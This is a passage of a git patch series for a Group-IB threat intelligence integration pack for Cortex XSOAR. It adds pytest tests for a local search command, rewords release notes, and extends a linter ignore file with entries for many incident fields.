client.poller.create_search_generator.return_value = [] + return client + + +@pytest.fixture +def mock_common_helpers(): + """Fixture to mock CommonHelpers functions.""" + with patch("GroupIBTIA.CommonHelpers.validate_collections") as mock_validate, \ + patch("GroupIBTIA.CommonHelpers.date_parse") as mock_date_parse: + mock_validate.return_value = None + mock_date_parse.side_effect = lambda date, arg_name: f"parsed_{date}" if date else None + yield mock_validate, mock_date_parse + + +def test_local_search_command_no_results(mock_client, mock_common_helpers): + """ + Given: A valid collection name and search query, with no results returned by the client. + When: The local_search_command function is executed. + Then: The function should return an empty list with appropriate formatting. + """ + args = {"query": "test_query", "collection_name": "test_collection"} + + result = local_search_command(mock_client, args) + + assert isinstance(result, CommandResults) + assert result.outputs_prefix == "GIBTIA.search.local" + assert result.outputs_key_field == "id" + assert result.outputs == [] + assert "Search results" in result.readable_output + + +def test_local_search_command_with_results(mock_client, mock_common_helpers): + """ + Given: A valid collection name, search query, and results returned by the client. + When: The local_search_command function is executed. + Then: The function should return a formatted list of search results. + """ + mock_client.poller.create_search_generator.return_value = [ + MagicMock(parse_portion=lambda keys, as_json: [ + {"id": "123", "name": "Test Result"}, + {"id": "456", "name": "Another Result"}, + ]) + ] + + args = {"query": "test_query", "collection_name": "test_collection"} + + result = local_search_command(mock_client, args) + + assert isinstance(result, CommandResults) + assert result.outputs_prefix == "GIBTIA.search.local" + assert result.outputs_key_field == "id" + assert len(result.outputs) == 2 + assert result.outputs[0]["id"] == "123" + assert result.outputs[0]["additional_info"] == "Name: Test Result" + assert "Search results" in result.readable_output + assert "Name: Test Result" in result.readable_output + assert "Name: Another Result" in result.readable_output diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/ReleaseNotes/2_0_0.md b/Packs/GroupIB_ThreatIntelligenceAttribution/ReleaseNotes/2_0_0.md index d4e40df691e5..7499ff84191c 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/ReleaseNotes/2_0_0.md +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/ReleaseNotes/2_0_0.md @@ -979,16 +979,16 @@ - New: Added a new incident field- GIB Phishing Date Updated that support new collections <~XSIAM> (Available from Cortex XSIAM 2.0). <~XSOAR> (Available from Cortex XSOAR 6.10.0). -- -- ##### New: GIB Nation-State Cybercriminals Threat Actor Aliases -- New: Added a new incident field- GIB Nation-State Cybercriminals Threat Actor Aliases that support new collections +- ##### GIB Nation-State Cybercriminals Threat Actor Aliases + +- GIB Nation-State Cybercriminals Threat Actor Aliases supports new collections <~XSIAM> (Available from Cortex XSIAM 2.0). <~XSOAR> (Available from Cortex XSOAR 6.10.0). - -- ##### New: GIB Scanner Sources +- ##### GIB Scanner Sources -- New: Added a new incident field- GIB Scanner Sources that support new collections +- GIB Scanner Sources now supports new collections <~XSIAM> (Available from Cortex XSIAM 2.0). <~XSOAR> (Available from Cortex XSOAR 6.10.0). @@ -996,7 +996,7 @@ ##### New: GIB Cybercriminal Threat Actor -- New: Added a new incident type- GIB Cybercriminal Threat Actor that support new collections +- New: Added a new incident type- GIB Cybercriminal Threat Actor that supports new collections <~XSIAM> (Available from Cortex XSIAM 2.0). <~XSOAR> (Available from Cortex XSOAR 6.10.0). ##### New: GIB Attacks Phishing Kit From 4f7d86939dd196722491a6fdb046479f13ce48f3 Mon Sep 17 00:00:00 2001 From: Amichai Date: Sun, 2 Feb 2025 13:26:42 +0200 Subject: [PATCH 8/9] Fix pack ignore --- Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore | 5 +---- 1 file changed, 1 insertion(+), 4 deletions(-) diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore b/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore index a00ee9ea7a07..96f9297a525f 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore @@ -292,9 +292,6 @@ ignore=IF115 [file:incidentfield-GIB_Socks_Proxy_Source.json] ignore=IF115 -[file:incidentfield-GIB_Phishing_Date_Updated.json] -ignore=IF115 - [file:incidentfield-GIB_Nation-State_Cybercriminals_Threat_Langs.json] ignore=IF115 @@ -384,7 +381,7 @@ ignore=GR103 ignore=BA116 [file:incidentfield-GIB_Phishing_Date_Updated.json] -ignore=BA116 +ignore=BA116,IF115 [file:layoutscontainer-GIB_OSI_Git_Leak_Layout.json] ignore=LO107 From 68be0c8b3f321c3a96c02f284ef05afd149d5ff0 Mon Sep 17 00:00:00 2001 From: Amichai Date: Sun, 2 Feb 2025 14:06:16 +0200 Subject: [PATCH 9/9] Fix for docs and ignore --- .../.pack-ignore | 182 +++++++++++++++++- .../ReleaseNotes/2_0_0.md | 8 +- 2 files changed, 182 insertions(+), 8 deletions(-) diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore b/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore index 96f9297a525f..a02071360f98 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore @@ -1,6 +1,9 @@ [file:GroupIBTIA.yml] ignore=BA108,BA109,BC104,BC102,ST111,RM110 +[file:GroupIBTIA.yml] +ignore=BA108,BA109,BC104,BC102,ST111,RM110 + [file:GroupIB_TIA_Feed.yml] ignore=BA108,BA109 @@ -331,8 +334,183 @@ ignore=IF115 [file:incidentfield-GIB_Country_Code.json] ignore=IF115 +[file:incidentfield-GIB_Upload_Time.json] +ignore=IF115 + +[file:incidentfield-GIB_Date_First_Compromised.json] +ignore=IF115 + +[file:incidentfield-GIB_Phishing_Kit_Email.json] +ignore=IF115 + +[file:incidentfield-GIB_DDOS_Target_Domain.json] +ignore=IF115 + +[file:incidentfield-GIB_Provider_Domain.json] +ignore=IF115 + +[file:incidentfield-GIB_Nation-State_Cybercriminals_Threat_Regions.json] +ignore=IF115 + +[file:incidentfield-GIB_Upload_Time.json] +ignore=IF115 + +[file:incidentfield-GIB_Cybercriminal_Regions.json] +ignore=IF115 + +[file:incidentfield-GIB_Nation-State_Cybercriminals_Expertises.json] +ignore=IF115 + +[file:incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Reports_Table.json] +ignore=IF115 + +[file:incidentfield-GIB_Country_Name.json] +ignore=IF115 + + +[file:incidentfield-GIB_Phishing_Objectives.json] +ignore=IF115 + +[file:incidentfield-GIB_Target_Provider.json] +ignore=IF115 + +[file:incidentfield-GIB_DDOS_Date_End.json] +ignore=IF115 + +[file:incidentfield-GIB_CNC.json] +ignore=IF115 + +[file:incidentfield-GIB_Date_Last_Compromised.json] +ignore=IF115 + +[file:incidentfield-GIB_Organization_BSB.json] +ignore=IF115 + +[file:incidentfield-GIB_Extended_Description.json] +ignore=IF115 + +[file:incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Description.json] +ignore=IF115 + +[file:incidentfield-GIB_Extended_CVSS_Temporal.json] +ignore=IF115 + +[file:incidentfield-GIB_Nation-State_Cybercriminals_Threat_Report_Number.json] +ignore=IF115 + +[file:incidentfield-GIB_DDOS_Target_Country_Name.json] +ignore=IF115 + +[file:incidentfield-GIB_GIB_Href.json] +ignore=IF115 + +[file:incidentfield-GIB_Target_Region.json] +ignore=IF115 + +[file:incidentfield-GIB_GIB_Cybercriminal_Forums_Table.json] +ignore=IF115 + +[file:incidentfield-GIB_Proxy_Sources.json] +ignore=IF115 + +[file:incidentfield-GIB_Phishing_Kit_Source.json] +ignore=IF115 + +[file:incidentfield-GIB_DDOS_Target_Port.json] +ignore=IF115 + +[file:incidentfield-GIB_Phishing_IP_Table.json] +ignore=IF115 + +[file:incidentfield-GIB_Target_ASN.json] +ignore=IF115 + +[file:incidentfield-GIB_Date_First_Seen.json] +ignore=IF115 + +[file:incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Goals.json] +ignore=IF115 + +[file:incidentfield-GIB_CNC_Port.json] +ignore=IF115 + +[file:incidentfield-GIB_Passwords.json] +ignore=IF115 + +[file:incidentfield-GIB_Cybercriminal_Threat_Description.json] +ignore=IF115 + +[file:incidentfield-GIB_Date_Modified.json] +ignore=IF115 + +[file:incidentfield-GIB_VPN_Sources.json] +ignore=IF115 + +[file:incidentfield-GIB_Phishing_Date_Detected.json] +ignore=IF115 + +[file:incidentfield-GIB_Organization_CLABE.json] +ignore=IF115 + +[file:incidentfield-GIB_Date_Add.json] +ignore=IF115 + +[file:incidentfield-GIB_Malware_Platforms.json] +ignore=IF115 + +[file:incidentfield-GIB_Proxy_Port.json] +ignore=IF115 + +[file:incidentfield-GIB_Nation-State_Cybercriminals_Threat_Expertises.json] +ignore=IF115 + +[file:incidentfield-GIB_CNC_URL.json] +ignore=IF115 + +[file:incidentfield-GIB_Compromised_Events_Information_Table.json] +ignore=IF115 + +[file:incidentfield-GIB_Is_Tailored.json] +ignore=IF115 + +[file:incidentfield-GIB_Date_Incident.json] +ignore=IF115 + +[file:incidentfield-GIB_Date_Published.json] +ignore=IF115 + +[file:incidentfield-GIB_DDOS_Date_Begin.json] +ignore=IF115 + +[file:incidentfield-GIB_DDOS_Request_Body.json] +ignore=IF115 + +[file:incidentfield-GIB_Nation-State_Cybercriminals_Threat_Title.json] +ignore=IF115 + +[file:incidentfield-GIB_DDOS_Request_Headers_Hash.json] +ignore=IF115 + +[file:incidentfield-GIB_Nation-State_Cybercriminals_Threat_Description.json] +ignore=IF115 + +[file:incidentfield-GIB_Cybercriminal_Threat_Title.json] +ignore=IF115 + +[file:incidentfield-GIB_Email_Domains.json] +ignore=IF115 + +[file:incidentfield-GIB_DDOS_Type.json] +ignore=IF115 + +[file:incidentfield-GIB_Malware_Table.json] +ignore=IF115 + +[file:incidentfield-GIB_Parsed_Login_IP.json] +ignore=IF115 + [file:incidentfield-GIB_Date_Updated_At.json] -ignore=GR103 +ignore=GR103,IF115 [file:incidentfield-GIB_Date_Expired.json] ignore=GR103 @@ -378,7 +556,7 @@ ignore=GR103 ignore=GR103 [file:incidentfield-GIB_Scanner_Sources.json] -ignore=BA116 +ignore=BA116,IF115 [file:incidentfield-GIB_Phishing_Date_Updated.json] ignore=BA116,IF115 diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/ReleaseNotes/2_0_0.md b/Packs/GroupIB_ThreatIntelligenceAttribution/ReleaseNotes/2_0_0.md index 7499ff84191c..61937596eb74 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/ReleaseNotes/2_0_0.md +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/ReleaseNotes/2_0_0.md @@ -855,11 +855,7 @@ ##### GIB Phishing Kit Emails - Updated the GIB Phishing Kit Emails incident field to support new collections. -##### New: CPE Table -- New: Added a new incident field- CPE Table that support new collections -<~XSIAM> (Available from Cortex XSIAM 2.0). -<~XSOAR> (Available from Cortex XSOAR 6.10.0). ##### GIB Date Created - Updated the GIB Date Created incident field to support new collections. @@ -980,13 +976,13 @@ <~XSIAM> (Available from Cortex XSIAM 2.0). <~XSOAR> (Available from Cortex XSOAR 6.10.0). -- ##### GIB Nation-State Cybercriminals Threat Actor Aliases +##### GIB Nation-State Cybercriminals Threat Actor Aliases - GIB Nation-State Cybercriminals Threat Actor Aliases supports new collections <~XSIAM> (Available from Cortex XSIAM 2.0). <~XSOAR> (Available from Cortex XSOAR 6.10.0). - -- ##### GIB Scanner Sources +##### GIB Scanner Sources - GIB Scanner Sources now supports new collections <~XSIAM> (Available from Cortex XSIAM 2.0).